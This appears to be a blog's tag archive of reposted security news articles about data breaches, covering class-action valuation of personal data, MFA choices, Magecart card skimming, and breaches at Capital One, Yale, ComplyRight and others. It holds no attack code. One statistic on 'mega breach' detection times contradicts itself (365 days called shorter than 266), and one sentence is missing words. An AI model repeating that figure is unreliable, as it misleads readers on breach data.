Tag Archives: breach

Assessing the value of personal data for class action lawsuits

When it comes to personal data exposed in a breach, assessing the value of that data for class actions lawsuits is more of an art than a science.

As interest in protecting and controlling personal data has surged among consumers lately, there have been several research reports that discuss how much a person’s data is worth on the dark web. Threat intelligence provider Flashpoint, for example, published research last month that said access to a U.S. bank account, or “bank log,” with a $10,000 balance was worth about $25. However, the price of a package of personally identifiable information (PII) or what’s known as a “fullz” is much less, according to Flashpoint; fullz for U.S. citizens that contain data such as victims’ names, Social Security numbers and birth dates range between $4 and $10.

But that’s the value of personal data to the black market. What’s the value of personal data when it comes to class action lawsuits that seek to compensate individuals who have had their data exposed or stolen? How is the value determined? If an organization has suffered a data breach, how would it figure out how much money they might be liable for?

SearchSecurity spoke with experts in legal, infosec and privacy communities to find out more about the obstacles and approaches for assessing personal data value.

The legal perspective

John Yanchunis leads the class action department of Morgan & Morgan, a law firm based in Orlando, Fla., that has handled the plaintiff end for a number of major class action data breach lawsuits, including Equifax, Yahoo and Capital One.

The 2017 Equifax breach exposed the personal information of over 147 million people, and resulted in the credit reporting company creating a $300 million settlement fund for victims (which doesn’t even account for the hundreds of millions of dollars paid to other affected parties). Yahoo, meanwhile, was hit with numerous data breaches between 2013 and 2016. In the 2013 breach, every single customer account was affected, totaling 3 billion users. Yahoo ultimately settled a class action lawsuit from customers for $117.5 million.

When it comes to determining the value of a password, W-2 form or credit card number, Yanchunis called it “an easy question but a very complex answer.”

“Is all real estate in this country priced the same?” Yanchunis asked. “The answer’s no. It’s based on location and market conditions.”

Yanchunis said dark web markets can provide some insight into the value of personal data, but there are challenges to that approach. “In large part, law enforcement now monitors all the traffic on the dark web,” he said. “Criminals know that, so what are they doing? They’re using different methods of marketing their product. Some sell it to other criminals who are going to use it, some put it on a shelf and wait until the dust settles so to speak, while others monetize it themselves.”

As a result, several methods are used to determine the value of breached personal data for plaintiffs. “You’ll see in litigation we’ve filed, there are experts who’ve monetized it through various ways in which they can evaluate the cost of passwords and other types of data,” Yanchunis said. “But again, to say what it’s worth today or a year ago, it really depends upon a number of those conditions that need to be evaluated in the moment.”

David Berger, partner at Gibbs Law Group LLP, was also involved in the Equifax class action lawsuit and has represented plaintiffs in other data breach cases. Berger said that it was possible to assess the value of personal data, and discussed a number of damage models that have been successfully asserted in litigation to establish value.

One way is to look at the value of a piece of information to the company that was breached, he said.

“In other words, how much a company can monetize basically every kind of PII or PHI, or what they are getting in different industries and what the different revenue streams are,” Berger said. “There’s been relatively more attention paid to that in data breach lawsuits. That can be one measure of damages.”

Another approach looks at the value of an individual’s personal information to that individual. Berger explained that this can be measured in multiple different ways. In litigation, economic modeling and “fairly sophisticated economic techniques” would be employed to figure out the market value of a piece of data.

Another approach to assessing personal data value is determining the cost of what individuals need to do to protect themselves from misuse of their data, such as credit monitoring services. Berger also said “benefit-of-the-bargain” rule can also help; the legal principle dictates that a party that breaches a contract must pay the victim of the breached contract an amount in damages that puts them in the same financial position they would be in if the contract was fulfilled.

For example, Berger said, say a consumer purchases health insurance and is promised reasonable data security, but if the insurance carrier was breached then “[they] got health insurance that did not include reasonable data security. We can use those same economic modeling techniques to figure out what’s the delta between what they paid for and what they actually received.”

Berger also said the California Consumer Privacy Act (CCPA), which he called “the strongest privacy law in the country,” will also help because it requires companies to be transparent about how they value user data.

“The regulation puts a piece on that and says, ‘OK, here are eight different ways that the company can measure the value of that information.’ And so we will probably soon have a bunch of situations where we can see how companies are measuring the value of data,” Berger said.

The CCPA will go into effect in the state on Jan. 1 and will apply to organizations that do business in the state and either have annual gross revenues of more than $25 million; possess personal information of 50,000 or more consumers, households or devices; or generates more than half its annual revenue from selling personal information of consumers.

Security and privacy perspectives

Some security and privacy professionals are reluctant to place a dollar value on specific types of exposed or breached personal data. While some advocates have pushed the idea of valuing consumer’s personal data as a commodities or goods to be purchased by enterprises, others, such as the Electronic Frontier Foundation (EFF) — an international digital rights group founded 29 years ago in order to promote and protect internet civil liberties — are against it.

An EFF spokesperson shared the following comment, with part of which being previously published in a July blog post titled, “Knowing the ‘Value’ of Our Data Won’t Fix Our Privacy Problems.”

“We have not discussed valuing data in the context of lawsuits, but our position on the concept of pay-for-privacy schemes is that our information should not be thought of as our property this way, to be bought and sold like a widget. Privacy is a fundamental human right. It has no price tag.”

Harlan Carvey, senior threat hunter at Digital Guardian, an endpoint security and threat intelligence vendor, agreed with Yanchunis that assessing the value of personal data depends on the circumstances of each incident.

“I don’t know that there’s any way to reach a consensus as to the value of someone’s personally identifiable data,” Carvey said via email. “There’s what the individual believes, what a security professional might believe (based on their experience), and what someone attempting to use it might believe.”

However, he said the value of traditionally low-value or high-value data might be different depending on the situation.

“Part of me says that on the one hand, certain classes of personal data should be treated like a misdemeanor, and others like a felony. Passwords can be changed, as can credit card numbers; SSNs cannot. Not easily,” Carvey said. “However, having been a boots-on-the-ground, crawling-through-the-trenches member of the incident response industry for a bit more than 20 years, I cringe when I hear or read about data that was thought to have been accessed during a breach. Even if the accounting is accurate, we never know what data someone already has in their possession. As such, what a breached company may believe is low-value data is, in reality, the last piece of the puzzle someone needed to completely steal my identity.”

Jeff Pollard, vice president and principal analyst at Forrester Research, said concerns about personal data privacy have expanded beyond consumers and security and privacy professionals to the very enterprises that use and monetize such data. There may be certain kinds of personal data that can be extremely valuable to an organization, but the fear of regulatory penalties and class action lawsuits are causing some enterprises to limit the data they collect in the first place.

“Companies may look at the data and say, ‘Sure, it’ll make our service better, but it’s not worth it’ and not collect it all,” Pollard said. “A lot of CISOs feel like they’ll be better off in the long run.”

Editor’s note: This is part one of a two-part series on class action data breach lawsuits. Stay tuned for part two.

Security news director, Rob Wright, contributed to this report.

Go to Original Article
Author:

Top Office 365 MFA considerations for administrators

With the rise in data breach incidents reported by companies of all sizes, it doesn’t take much effort to find a cache of leaked passwords that can be used to gain unauthorized access to email or another online service.

Administrators can make users produce complex passwords and change them frequently to ensure they set a different password for different applications or systems. It’s a helpful way to keep hackers from guessing a login, but it’s a practice that can backfire. Many users struggle with memorizing password variations, which tends to lead to one complex password used across multiple systems. Industrious hackers who find a password dump can assume some end users will use the same password — or a variation of it — across multiple workloads online to make it easier to pry their way into other systems.

IT departments in the enterprise realize that unless they implement specific password policies and enforce them, their systems may be at risk of a hack attempt. To mitigate these risks, many administrators will try multifactor authentication (MFA) products to address some of the identity concerns. MFA is the technology that adds another layer of authentication after users enter their password to confirm their identity, such as a biometric verification or a code sent via text to their phone. An organization that has moved its collaboration workloads to Microsoft’s cloud has a few Office 365 MFA options.

When considering an MFA product, IT administrators must consider several key areas, especially when some of the services they may subscribe to, such as Microsoft Azure and Office 365, include MFA functionality from Microsoft. Depending on the level of functionality needed and services covered by MFA, IT administrators might consider selecting a third-party vendor, even when that choice will require more configuration work with Active Directory and cloud services. IT workers unfamiliar with MFA technology can look over the following areas to help with the selection process.

When considering the purchase of an MFA product, IT administrators must consider several key areas, especially when some of the services they may subscribe to, such as Microsoft Azure and Office 365, include MFA functionality from Microsoft.

Choosing the right authentication options for end users

IT administrators must investigate what will work best for their end users because there are several options to choose from when it comes to MFA. Some products use phone calls for confirmation, code via text messaging, key fobs, an authenticator app and even facial recognition. Depending on what the consensus is in the organization, the IT decision-makers have to work through the evaluation process to make sure the vendor supports the option they want.

Identifying which MFA product supports cloud workloads

More organizations have adopted some cloud service, such as Office 365, Azure, AWS and other public clouds. The MFA product must adapt to the needs of the organization as it adds more cloud services. While Microsoft offers its own MFA technology that works with Office 365, other vendors such as Duo Security — owned by Cisco — and Okta support Office 365 MFA for companies that want to use a third-party product.

Potential problems that can affect Office 365 MFA users

Using Office 365 MFA helps improve security, but there is potential for trouble that blocks access for end users. This can happen when a phone used for SMS confirmation breaks or is out of the user’s possession. Users might not gain access to the system or the services they need until they recover their device or change their MFA configuration.

Another possible problem to the authentication process can happen on the other end if the MFA product goes down and blocks access for everyone who has enabled MFA. These probabilities require IT to discuss and plan before implementing Office 365 MFA for the appropriate steps to be taken if these issues arise.

Evaluate the overall costs and features related to MFA

For the most part, MFA products are subscription-based that charge a monthly fee per user. Some vendors, such as Microsoft, bundle MFA with self-service identity, access management, access reporting and self-service group management. Third-party vendors might offer different MFA features; as one example, Duo Security includes self-enrollment and management, user risk assessment with phishing simulation, and device access monitoring and identification with its MFA product.

Single sign-on, identity management and identity monitoring are all valuable features that, if included with an MFA offering, should be worth considering when it’s time to narrow the vendor list.

Go to Original Article
Author:

In light of MGH healthcare data breach, experts call for transparency

A recent healthcare data breach at Massachusetts General Hospital underscores the need for greater transparency when it comes to cybersecurity incidents.

Cybersecurity experts describe MGH’s statement on the breach as being light on details. In its announcement about the healthcare data breach, MGH stated that it is notifying nearly 10,000 individuals of a privacy incident that occurred in research programs within MGH’s department of neurology. The statement said that an unauthorized third party “had access to databases related to two computer applications used by researchers in the Department of Neurology for specific neurology research studies.”

The report provided no insight into how the breach occurred. David Holtzman, a health IT expert and an executive advisor for cybersecurity company CynergisTek Inc., other healthcare organizations that could have potentially learned from the incident.

“Healthcare organizations should consider how their experiences can benefit the larger healthcare industry through greater transparency and sharing of information if they suffer a cybersecurity incident,” he said.

A call for more transparency

MGH and its corporate parent, Partners HealthCare, have invested significantly in information security programs and cybersecurity defenses since 2011, according to Holtzman.

David Holtzman, executive advisor, CynergisTekDavid Holtzman

The effort was spurred by a settlement with the Department of Health & Human Services’ Office for Civil Rights related to a 2009 data loss incident. According to the resolution agreement, an MGH employee took home documents containing the protected health information of 192 individuals. The employee left the documents on a train when commuting to work on March 9, 2009. The documents were never recovered.

MGH was charged with a $1 million fine and committed to a corrective action plan to strengthen its information security programs.

It’s MGH’s investment in cybersecurity plus its “good reputation in the healthcare community” that should spur the organization to be more transparent when a cybersecurity incident occurs so that other organizations can learn from the incident and strengthen their own programs, Holtzman said.

He believes details such as whether MGH has evidence that the healthcare data breach was the result of an outside attack as well as the mode of attack would be helpful for other healthcare organizations.

“Was it the type of attack that overwhelmed or pretended to overwhelm the security of the enterprise information system? Was it accomplished through social engineering or an email phishing attack? Or is this the work of a malicious insider,” Holtzman questioned.

Israel Barak, CISO, Cybereason Israel Barak

Israel Barak, CISO for Boston-based cybersecurity company Cybereason Inc., said MGH sets a high standard for cybersecurity across the healthcare industry, and if it can be breached, CIOs and other healthcare leaders should pay attention.

“This should be an indication to the healthcare industry as a whole that we really need to step up our game. Because if this is what’s happening in an organization that sets the high standard, then what can we expect from organizations that look up to Massachusetts General and try to improve based on their example?” he said.

He was also struck by how long it took for MGH to discover the breach in the first place.

This should be an indication to the healthcare industry as a whole that we really need to step up our game.
Israel BarakCISO, Cybereason

According to MGH’s statement, the organization discovered the breach on June 24. Yet, an internal investigation revealed that between June 10 and June 16, the unauthorized third party “had access to databases containing research data used by certain neurology researchers,” two weeks before the breach was discovered.

Data breaches happen frequently in healthcare, but Barak said becoming aware that a breach occurred two weeks after it happened is “a standard we need to improve.”

Takeaways from MGH healthcare data breach

MGH’s statement said the affected research data could have included participants’ first and last names, some demographic information such as sex or race, date of birth, dates of study visits and tests, medical record number, type of study, research study identification numbers, diagnosis and medical history, biomarkers and genetic information, and types of assessments and results. The data didn’t include Social Security numbers, insurance or financial information and did not involve MGH’s medical records systems, according to the statement.

The MGH communications department has no further information on the healthcare data breach other than what’s contained in the statement, according to Michael Morrison, director of media relations at MGH.

CynergisTek’s Holtzman said all data that contains personally identifiable information should have “reasonable and appropriate safeguards to prevent the unauthorized use or disclosure of the information.” Any organization handling sensitive personal information should take a risk-based approach to assessing threats and vulnerabilities to enterprise information systems, he said.

“Take the results of the risk analysis and develop a plan to mitigate and identify threats and vulnerabilities to reduce the risk to sensitive information to a reasonable level,” he said.

Barak said it’s a given that healthcare security systems will get breached, “but the bigger question is, how quickly and how efficiently we can recover from something that happened. What is our cyber resiliency?”

Go to Original Article
Author:

Capital One breach suspect may have hit other companies

A new report looking into the attacker accused in the Capital One breach discovered references to other potential victims, but no corroborating evidence has been found yet.

The FBI accused Paige Thompson, who allegedly went by the name “Erratic” on various online platforms, including an invite-only Slack channel. The Slack channel was first reported on by investigative cybersecurity journalist Brian Krebs, who pointed out that file names referenced in the channel pointed to other organizations potentially being victims of similar attacks.

A new report by cybersecurity firm CyberInt, based in London, regarding the Capital One breach built on the information discovered by Krebs. Jason Hill, lead cybersecurity researcher at CyberInt, said the company was able to gain access to the Slack channel via an open invitation link.

“This link was obtained from the now-offline ‘Seattle Warez Kiddies’ Meetup group (Listed as ‘Organized by Paige Thomson’),” Hill wrote via email. “Based on the publicly available information at the time of report completion, such as Capital One’s statement and the [FBI’s] Criminal Complaint, we were able to conduct open source intelligence gathering to fill in some of the missing detail and follow social media leads to gain an understanding of the alleged threat actor and their activity over the past months.”

According to Hill, CyberInt researchers followed the trail through a GitHub account, GitLab page and a screenshot of a file archival process shared in the Slack channel.

“The right-hand side of the screen appears to show the output of the Linux command ‘htop’ that lists current processes being executed. In this case, under the ‘Command’ heading, we can see a number of ‘tar –remove-files -cvf – ‘ processes, which are compressing data (and then removing the uncompressed source),” Hill wrote. “These files correlate with the directory listing, and potential other victims, as seen later within the Slack channel.”

Between the files named in the screenshot and the corresponding messages in the Slack channel, it appeared as though in addition to the Capital One breach, the threat actor may have stolen 485 GB of data from various other organizations. Some organizations were implied by only file names, such as Ford, but others were named directly by Erratic in messages, including the Ohio Department of Transportation, Michigan State University, Infoblox and Vodafone.

Hill acknowledged that CyberInt did not directly contact any of the organizations named, because the company policy is normally to “contact organizations when our research detects specific vulnerabilities that can be mitigated, or threats detected by our threat intelligence platform.

“However in this case, our research was focused on the Capital One breach to gain an understanding of the threat actor’s tactics, techniques and procedures (TTP) and resulted in the potential identification of additional victims rather than the identification of any specific vulnerability or ongoing threat,” Hill wrote. “Our report offered general advice for those concerned about the TTP based on these findings.”

We contacted some of the organizations either directly named or implied via file name in Erratic’s Slack channel. The Ohio Department of Transportation did not respond to a request for comment. Ford confirmed an investigation is underway to determine if the company was the victim of a data breach.

A spokesperson for Michigan State University also confirmed an investigation is underway and the university is cooperating with law enforcement authorities, but at this point there is “no evidence to suggest MSU was compromised.”

Similarly, an Infoblox spokesperson said the company was “continuing to investigate the matter, however, at this time, there is no indication that Infoblox was in any way involved with the Capital One breach. Additionally, there is no indication of an intrusion or data breach causing Infoblox customer data to be exposed.”

A Vodafone spokesperson claimed the company takes security seriously, but added, “Vodafone is not aware of any information that relates to the Capital One security breach.”

Go to Original Article
Author:

British Airways data breach may be the work of Magecart

The British Airways data breach may have been the handiwork of the threat actor group known as Magecart.

Security researchers at the threat intelligence company RiskIQ Inc., reported that they suspect Magecart was behind the late August British Airways data breach, based on their analysis of the evidence. The Magecart group focuses on online credit card skimming attacks and is believed to be behind the Ticketmaster data breach discovered in June 2018.

British Airways reported it had suffered a breach on Sept. 6 that affected around 380,000 customers. The company said personal and payment information were used in payment transactions made on the website and the mobile app between Aug. 21 and Sept. 5.

In a blog post published a week later, RiskIQ researcher Yonathan Klijnsma said that because the British Airways data breach announcement stated that the breach had affected the website and mobile app but made no mention of breaches of databases or servers, he noticed similarities between this incident and the Ticketmaster breach.

The Ticketmaster breach was caused by a web-based credit card skimming scheme that targeted e-commerce sites worldwide. The RiskIQ team said that the Ticketmaster breach was the work of the hacking group Magecart, and was likely not an isolated incident, but part of a broader campaign run by the group.

The similarities between the Ticketmaster breach and the reports of the British Airways data breach led Klijnsma and the RiskIQ team to look at Magecart’s activity.

“Because these reports only cover customer data stolen directly from payment forms, we immediately suspected one group: Magecart,” Klijnsma wrote. “The same type of attack happened recently when Ticketmaster UK reported a breach, after which RiskIQ found the entire trail of the incident.”

Klijnsma said they were able to expand the timeline of the Ticketmaster activity and discover more websites affected by online credit card skimming.

“Our first step in linking Magecart to the attack on British Airways was simply going through our Magecart detection hits,” Klijnsma explained. “Seeing instances of Magecart is so common for us that we get at least hourly alerts for websites getting compromised with their skimmer-code.”

He noted that in the instance of the British Airways data breach, the research team had no notifications of Magecart’s activity because the hacking group customized their skimmer. However, they examined British Airways’ web and mobile apps specifically and noticed the similarities — and the differences.

The fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets.
Yonathan Klijnsmathreat researcher, RiskIQ

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately,” Klijnsma wrote. “This particular skimmer is very much attuned to how British Airway’s (sic) payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.”

Klijnsma also said it was likely Magecart had access to the British Airways website and mobile app before the attack reportedly started.

“While we can never know how much reach the attackers had on the British Airways servers, the fact that they were able to modify a resource for the site tells us the access was substantial, and the fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets,” he wrote.

Magecart, RiskIQ noted, has been active since 2015 and has been growing progressively more threatening as it customizes its skimming schemes for particular brands and companies.

In other news

  • President Donald Trump signed an executive order this week that imposes sanctions on anyone who attempts to interfere with U.S. elections. After Russian interference in the 2016 U.S. presidential election, there are fears that there will be further interference in the upcoming 2018 midterm election. In response to those fears, Trump signed an executive order that sanctions would be placed on foreign companies, organizations or individuals who have interfered with U.S. elections. The order says that government agencies must report any suspicious, malicious activity to the director of national intelligence, who will then investigate the report and determine its validity. If the director of national intelligence finds that the suspect group or individual has interfered, there will be a 45-day review and assessment period during which the Department of Justice and Homeland Security will decide whether sanctions are warranted. If they are, the foreign group or individual could have their U.S. assets frozen or be banned from the country.
  • A vulnerability in Apple’s Safari web browser enables attackers to launch phishing attacks. Security researcher Rafay Baloch discovered the vulnerability and was also able to replicate it in the Microsoft Edge browser. Baloch published the proof of concept for both browser vulnerabilities early this week, and while Microsoft had addressed the issue in its August Patch Tuesday release — citing an issue with properly parsing HTTP content as the cause — Apple has yet to issue any patches for it. The vulnerability in Safari iOS 11.3.1 could thus still be used to spoof address bars and trick users into thinking they are visiting a legitimate site that is actually malicious.
  • The hacker known as “Guccifer” will be extradited to the U.S. to serve a 52-month prison sentence. A Romanian court ruled that the hacker, who is known for exposing the misuse of Hillary Clinton’s private email server before the 2016 U.S. presidential election and whose real name is Marcel Lehel Lazar, will be extradited to America to serve his 52-month sentence after finishing his seven-year sentence in Romania — his home country. Lazar pleaded guilty in May 2016 to charges of unauthorized access to a protected computer and aggravated identity theft. Lazar is believed to have hacked into the accounts of around 100 people between 2012 and 2014, including former Secretary of State Colin Powell, CBS Sports’ Jim Nantz and Sidney Blumenthal, a former political aide to Bill Clinton and adviser to Hillary Clinton.

Missouri hospital sued over medical records breach

A hospital in Missouri faces a lawsuit after a medical records breach occurred as a result of an email phishing scam, something that’s difficult to protect against within healthcare organizations, according to a security expert.  

In January, Children’s Mercy Hospital in Kansas City, Mo., notified 63,049 individuals who were potentially affected by the medical records breach, according to Jake Jacobson, Children’s Mercy director of public relations.

An investigation led by the hospital determined that the mailbox accounts of four of five affected employees had been downloaded by unauthorized individuals. According to the notification, information accessed during the incident varied by individual, but could include information such as medical record number, first and last name, date of birth, gender, age, height, weight, body mass index, admission and discharge date, procedure date, diagnostic and procedure codes, demographic information, clinical information, conditions and diagnosis, and other treatment information and identifying or contact information.

Fight back with email screening tools

Security expert Larry Ponemon said a number of healthcare providers are particularly susceptible to phishing scams because cybersecurity is not their “highest priority” and they often lack a “good governance process” for controlling data access. Ponemon is the founder of Ponemon Institute, which studies data protection and information security.

“It seems like the healthcare industry, healthcare providers [are] the most vulnerable relative to the industries we study,” Ponemon said.

Within the healthcare industry there’s “not really a great technology that could identify a phishing email,” Ponemon said. He noted that implementing employee training and installing email screening tools that scour incoming emails, attachments and embedded URLs to identify potential phishing attacks could go a long way toward keeping such incidents at bay.

It seems like the healthcare industry, healthcare providers [are] the most vulnerable relative to the industries we study.
Larry Ponemonfounder, Ponemon Institute

“A lot of phishing scams I’ve seen have not been all that difficult to see,” Ponemon said. “If you look at the information, read the link, you can guess with about 90% accuracy that basically this is not real and [is] likely to be a phishing email. But people in healthcare are under a lot of pressure, so when they get an email they don’t necessarily stop and check the terms in each email.”

Additionally, Ponemon said healthcare organizations often operate a “flat network,” instead of having layers, meaning when something happens in one device, it can spread very quickly to multiple devices, which he described as a “lateral infection.”

“Malware infections on one system can actually touch hundreds or even thousands of systems in the world of IoT; in healthcare everything is about an IoT device,” Ponemon said. “That’s why it’s easy for bad stuff, malware, phishing scams, to spread quickly.”

Jacobson, with Children’s Mercy, said the hospital has taken steps to protect against further incidents, including implementing additional technical control of multifactor authentication. Additionally, the hospital has installed a call center and informational webpage to provide answers to families who might have been affected and is offering free identify theft protection to those families.

Medical records breaches not new

The lawsuit against Children’s Mercy Hospital was filed by the firm McShane & Brady in July. Attorney Maureen Brady said the firm would like to see medical records breaches stopped.

“It’s very hard because you can’t unring that bell,” Brady said. “Once the information is out, it’s out forever; you can’t get it back … the anxiety and embarrassment and humiliation that goes along with this type of disclosure is astronomical.”

The threat of a medical records breach occurring is not new to the healthcare community. Though 2017 saw fewer massive health data breaches compared to 2016, 5.6 million Americans suffered from a medical records breach, an average of at least one medical records breach per day throughout the year, according to data released last year by Protenus.

In addition to the newly filed lawsuit, Children’s Mercy Hospital has faced other lawsuits in the past for medical records breaches.

Yale data breach discovered 10 years too late

Yale University discovered it suffered a data breach — 10 years ago.

The Yale data breach occurred at some point between April 2008 and January 2009, but officials are unsure exactly when. The Yale data breach included sensitive data such as names, Social Security numbers and birth dates on an unknown number of people, as well as some email addresses and physical addresses.

Because the Yale data breach happened so long ago, the University claimed it did not have much information on how it occurred. In its announcement of the breach, Yale noted that in 2011, the school’s IT “deleted the personal information in the database as part of an effort to eliminate unneeded personal information on Yale servers, but the intrusion was not detected at that time.”

The Yale data breach was not discovered until June 2018 when the school’s IT was “testing its servers for vulnerabilities and discovered a log that revealed the intrusion.”

Ryan Wilk, vice president at NuData Security, said the data included in the breach was more than enough to put users at risk.

“Although financial information was not exposed, even having your Social Security number, name, address and date of birth stolen can still cause problems,” Wilk wrote via email. “Cybercriminals can use this information to create a complete profile of students. Add a bit of social engineering, and they can start cracking all types of accounts and even open up new accounts in the students’ names.”

The school said it notified those students, alumni, faculty and staff memers affected by the breach and has offered identity monitoring services.

Zach Seward, CPO and executive editor at Quartz, was one victim in the Yale data breach, and he relayed his story on Twitter.

Wilk said it might not be Yale’s fault for not discovering the breach sooner.

“Malicious actors are learning not only to access a system but also to do it without leaving a trace. This extreme sophistication results in hard-to-uncover breaches that can take a long to reveal. We encourage companies and organizations to monitor their security system constantly and to stay alert for any unusual activity,” Wilk wrote. “Even if they’ve checked unusual activity thousands of times and it turned out to be nothing risky, the next time that anomaly may just be your cybercriminal at work.”

Ponemon: Mega breaches, data breach costs on the rise

The Ponemon Institute’s latest study on data breach costs highlights the rise of what it calls “mega breaches,” which are the worst types of security incidents in terms of costs and data exposed.

The “2018 Cost of a Data Breach Study: Global Overview,” which was sponsored by IBM Security, details the cost enterprises incur after falling victim to a data breach and found that the average total cost of a data breach rose from $3.62 to $3.86 million — a 6.4% increase — with $148 as the average cost per lost or stolen record. This year’s report also features data on the biggest breaches, which Ponemon and IBM have termed “mega breaches.”

“Mega breaches are where there are more than one million records that have been breached,” Limor Kessem, executive security advisor at IBM, told SearchSecurity. “And then we looked at up to 50 million [records exposed], although it could be up to infinity these days. Just last year there were 2.9 billion records exposed, and in 2016 there were over 4 billion records exposed, so a breach can be millions and hundreds of millions as well.”

Given that this is the first year that Ponemon has included mega breaches in its annual report and that there were only 11 mega breaches that occurred, there was no data from past years to compare these findings to. However, the report found that a mega breach with the minimum of 1 million records exposed lead to an average total cost of $40 million, while a mega breach with 50 million records exposed had an average cost of $350 million.

 After collecting data from more than 2,500 separate interviews that were conducted over a 10-month period with 477 enterprises, the study concluded that mega breaches take 365 days to identify, which is almost 100 days shorter than typical breaches (266 days to detect).

The Ponemon study also discovered that “data breaches are the most costly in the United States and the Middle East and least costly in Brazil and India,” given that the average total in the United States was $7.91 million. “The U.S. topped the chart at almost twice the international average,” Kessem said. “Of course there are currency differences, but the big thing in the U.S. is loss of business.”

Kessem further noted that when consumers were interviewed, 75% of them said they would not want to do business with a company that they didn’t trust to safeguard their data.

“People in the U.S. are very aware of breaches,” she said. “They topped the charts in awareness of how [data breaches] happen and how many happen and so on. In other words, we know breaches are happening and we wouldn’t like to do business with those who can’t protect our data and I think this was a major cost center for the U.S. in terms of data breaches.”

In addition to the cost per record, companies also experience direct and indirect costs after a breach. For example, Canada has the highest direct costs, according to the report, but the U.S. had the highest indirect cost at $152 per capita, which includes “employee’s time, effort and other organizational resources spent notifying victims and investigating the incident.” The study also highlights the idea that breaches in the healthcare industry are the most expensive and have been consistently so for several years, according to Kessem, considering the amount of personal data healthcare companies possess. 

“Typically [healthcare companies] have a lot of personally identifiable information,” she said. “They’re also going to have payment information and contact information — the more information is attached to an identity, the more it is going to cost.”

Post-breach consequences are further addressed in the report, which states, “Organizations that lost less than one percent of their customers due to a data breach resulted in an average total cost of $2.8 million.” However, the Ponemon study also noted that an incident response team has the ability to reduce the cost by as much as $14 per compromised record — a small change that would greatly add up at the end of a breach.

ComplyRight data breach affects 662,000, gets lawsuit

A data breach at ComplyRight, a firm that provides HR and tax services to businesses, may have affected 662,000 people, according to a state agency. It has also prompted a lawsuit, which was filed in federal court by a person who was notified that their personal data was breached. The lawsuit seeks class-action status.

The ComplyRight data breach included names, addresses, phone numbers, email addresses and Social Security numbers, some of which came from tax and W-2 forms.

ComplyRight’s services include a range of HR products, such as recruitment, time and attendance, as well as an online app for storing essential employee data. This particular attack was directed at its tax-form-preparation website. Hackers go after customer and employee data. The Identity Theft Resource Center 2018 midyear report, for instance, lists every known breach so far this year. It said the compromised data is a shopping list of HR managed data.

Company: No more than 10% of customers affected

The breach occurred between April 20 and May 22, and the company notified affected parties by mail.

ComplyRight, in a posted statement, said “a portion (less than 10%)” of people who have their tax forms prepared on its web platform were affected by a cyberattack, but it did not say how many customers were affected by its breach. The company knows the data was accessed or viewed, but it was unable to determine if the data was downloaded, according to the firm’s statement.

But the state of Wisconsin, which publishes data breach reports, has shed some light on the scale of the impact. It reported the ComplyRight data breach affected 662,000 people — including 12,155 Wisconsin residents. A spokesman for Wisconsin Department of Agriculture, Trade and Consumer Protection said this figure was provided verbally to the state by an attorney for ComplyRight.

Rick Roddis, president of ComplyRight, based in Pompano Beach, Fla., said in an email that the firm won’t be commenting, for now, beyond what it has posted on the site.

Among the steps ComplyRight said it took was the hiring of a third-party security expert who conducted a forensic investigation. The firm is also offering credit-monitoring services to affected parties.

Security expert Nikolai Vargas, who looked at the firm’s statement, said ComplyRight “is doing the bare minimum in terms of transparency and informing their clients of the details of the security incident.”

“In cases of a data breach, it is important to disclose how long the exposure occurred and the scope of the exposure,” said Vargas, who is CTO of Switchfast, an IT consulting and managed service provider based in Chicago. ComplyRight stating that “less than 10%” of individuals were affected “doesn’t really explain how many people were impacted,” he added.

“Technical details are nice to have, but they’re not always necessary and may need to be withheld until protections are put in place,” Vargas said.

Federal suit alleges poor protection

[ComplyRight] is doing the bare minimum in terms of transparency and informing their clients of the details of the security incident.
Nikolai VargasCTO at Switchfast

The ComplyRight data breach was first reported by Krebs on Security, which had heard from customers who had received breach notification letters.

Susan Winstead, an Illinois resident, received the notification from ComplyRight on July 17, outlining what happened. She is the plaintiff in the lawsuit filed July 20 in the U.S. District Court for the Northern District of Illinois.

The lawsuit faults ComplyRight for allegedly not properly protecting its data and not immediately notifying affected individuals, and the suit seeks damages for the improper disclosure of personal information, including the time and effort to remediate the data beach. 

Company faced difficult detective work

Another independent expert who looked at ComplyRight’s notice, Avani Desai, said the company “followed best practice for incident response.”

With a cyberattack, one of the most difficult processes initially is identifying that there was an actual attack and the true extent of it, said Desai, president of Schellman & Company, a security and privacy compliance assessor in Tampa, Fla. It’s important to ask the following questions early: Was there sensitive information that was involved? Which systems were exploited? The firm quickly hired a third-party forensic group, she noted.

“ComplyRight locked down the system prior to announcing the breach, which is important, because when organizations announce too quickly, we see copycat attacks hit the already vulnerable situation,” Desai said.

Mike Sanchez, chief information security officer of United Data Technologies, an IT technology and services firm in Doral, Fla., said the things the firm did right are “they disabled the platform and performed a forensic investigation to understand the cause of the breach, as well as the breadth of the malicious actor’s actions.”

But Sanchez said the firm’s statement, which he described as a “very high-level summary,” lacked many specifics, including the exact flaw that was used to gain access to the data.

The Identity Theft Resource Center reported that as of the first six months of this year, there were 668 breaches exposing nearly 22.5 million records.

Ticketmaster breach part of worldwide card-skimming campaign

The attack that caused the Ticketmaster breach of customer information last month was actually part of a widespread campaign that’s affected more than 800 e-commerce sites.

According to researchers at the threat intelligence company RiskIQ Inc., the hacking group known as Magecart has been running a digital credit card-skimming campaign that targets third-party components of e-commerce websites around the world.

At the end of June, ticket sales company Ticketmaster disclosed that it had been compromised and user credit card data had been skimmed. A report by RiskIQ researchers Yonathan Klijnsma and Jordan Herman said the Ticketmaster breach was not an isolated incident, but was instead part of the broader campaign run by the threat group Magecart.

“The target for Magecart actors was the payment information entered into forms on Ticketmaster’s various websites,” Klijnsma and Herman wrote in a blog post. “The method was hacking third-party components shared by many of the most frequented e-commerce sites in the world.”

A digital credit card skimmer, according to RiskIQ, uses scripts injected into websites to steal data entered into forms. Magecart “placed one of these digital skimmers on Ticketmaster websites through the compromise of a third-party functionality supplier known as Inbenta,” the researchers said, noting specifically that Ticketmaster’s network was not directly breached.

RiskIQ has been tracking the activities of Magecart since 2015 and said attacks by the group have been “ramping up in frequency and impact” throughout the past few years, and Ticketmaster and Inbenta are not the only organizations that have been affected by this threat.

According to Klijnsma and Herman, Inbenta’s custom JavaScript code was “wholly replaced” with card skimmers by Magecart.

“In the use of third-party JavaScript libraries, whether a customized module or not, it may be expected that configuration options are available to modify the generated JavaScript. However, the entire replacement of the script in question is generally beyond what one would expect to see,” they wrote.

